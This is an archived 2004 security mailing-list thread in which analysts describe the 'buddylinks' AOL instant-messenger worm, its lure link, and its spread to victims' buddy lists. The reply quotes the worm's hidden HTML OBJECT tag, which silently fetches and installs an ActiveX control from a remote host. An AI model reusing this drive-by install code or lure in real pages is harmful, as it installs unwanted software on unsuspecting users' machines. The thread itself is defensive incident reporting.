Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

RE: buddylinks worm

From: "Jeremy Junginger" <jj () act com>
Date: Tue, 10 Feb 2004 15:57:55 -0700
Yep!  It actually uses the follwing method:

<OBJECT ID="ShellInstaller" WIDTH=0 HEIGHT=0
CLASSID="CLSID:FDDCE9FF-1FC6-413c-80B1-37B101FDA1D4"
CODEBASE="http://download.buddylinks.net/ShellInstaller.cab#Version=1,0,0,001
">
</OBJECT>

To install ShellINstaller.INF (Size: 2,119) and ShellInstaller.ocx (Size
81,920), which is an ActiveX control.  That's all I've found so far.  Let me
know if you guys find anything else.  

-Jeremy

-----Original Message-----
From: Jason Yates [mailto:jaywhy2 () comcast net] 
Sent: Tuesday, February 10, 2004 2:58 PM
To: incidents () securityfocus com
Subject: buddylinks worm


Another one of the AOL worms; this one instant messages all users on 
your buddy list.  The message I've recieved is "check this out: 
http://ww.wgutv.com/osama_capture.php?bNek";.  The link is a fact news 
website telling you to download some software .  Once you install the 
software on the page; it immediately instant messages everyone on your 
buddy list.

The software it installs is something called buddylinks.  According to 
buddylinks.net, Buddylinks is a "revolutionary new way for instant 
messenger users to instantaneously share entertaining content with their
entire IM "buddy list" network all at one time".  I can't make this 
stuff up.

Jason Yates

---------------------------------------------------------------------------
Free trial: Astaro Security Linux -- firewall with Spam/Virus Protection

Protect your network with the comprehensive security solution that integrates
six applications for ease of use and lower TCO.

Firewall - Virus protection - Spam protection - URL blocking - VPN
- Wireless security.

Download 30-day evaluation at:
http://www.astaro.com/php/contact/securityfocus.php
----------------------------------------------------------------------------




This e-mail message and all attachments transmitted with it may be confidential 
and are intended solely for the addressee(s). If you are not the intended recipient
or the person responsible for delivering it to the intended recipient, you are
hereby notified that any reading, dissemination, distribution, copying, or other 
use of this message or its attachment(s) is strictly prohibited.  If you receive 
this email in error, please immediately notify the sender of the message or 
Best Software, Inc. by e-mailing postmaster () bestsoftware com and destroy all copies 
of this message.  Best Software, for the protection of our internal systems and 
those of our customers, does block most email attachments.



---------------------------------------------------------------------------
Free trial: Astaro Security Linux -- firewall with Spam/Virus Protection

Protect your network with the comprehensive security solution that
integrates six applications for ease of use and lower TCO.

Firewall - Virus protection - Spam protection - URL blocking - VPN
- Wireless security.

Download 30-day evaluation at:
http://www.astaro.com/php/contact/securityfocus.php
----------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: